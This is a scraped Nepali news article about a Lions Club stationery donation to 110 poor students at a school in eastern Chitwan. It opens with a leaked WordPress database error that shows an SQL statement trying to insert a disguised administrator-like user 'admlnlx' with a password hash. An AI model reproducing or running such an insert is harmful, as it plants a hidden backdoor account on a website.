WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B8uP4bJJ/.Nf.hw8DZbZI.P.8Q8ed7/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 03:54:58', '', 'admlnlx', 'admlnlx')
चितवन, माघ १४–
पूर्वी चितवनको कालिका नगरपालिका–६, खोलेसिमल बजारमा रहेको लायन्स क्लब अफ चितवन कालिकाले एक कार्यक्रमकाबीच आज विपन्न विद्यार्थीलाई स्टेशनरी सामाग्री सहयोग गरेको छ ।
सोही स्थानमा रहेको निम्न माध्यामिक विद्यालय, रेडक्रसग्राममा अध्ययनरत नर्सरीदेखि कक्षा ५ सम्मका विद्यार्थीलाई स्टेशनरी वितरण गरिएको थियो । क्लबद्वारा आयोजित कार्यक्रमका प्रमुख अतिथि लायन्स क्लब इन्टरनेशनल ३२५ बी२ का डिष्ट्रिक गर्भनर घनश्याम भट्टराई र विशिष्ट अतिथि चितवनका जिल्ला शिक्षा समितिका अध्यक्ष एवं स्थानीय विकास अधिकारी श्रवण कुमार पोखरेलले सो विद्यालयको कक्षा १ माअध्ययनरत छात्रा फूलमाया तामाङ स्टेशनरी प्रदान गरी कार्यक्रमको उद्घाटन गरेका थिए ।
स्थानीय चेपाङ, आदिवासी, दलित, जनजाति लगायतका विपन्न वर्गका विद्यार्थी अध्ययनरत सो विद्यालयका १ सय १० जना विद्यार्थीलाई स्टेशनरी वितरण गरिएको थियो । कार्यक्रम क्लबका अध्यक्ष विनोद रेग्मीको अध्यक्षतामा भएको थियो भने कार्यक्रम संयोजक चेतप्रसाद अधिकारीले स्वागत मन्तव्य व्यक्त गरेका थिए ।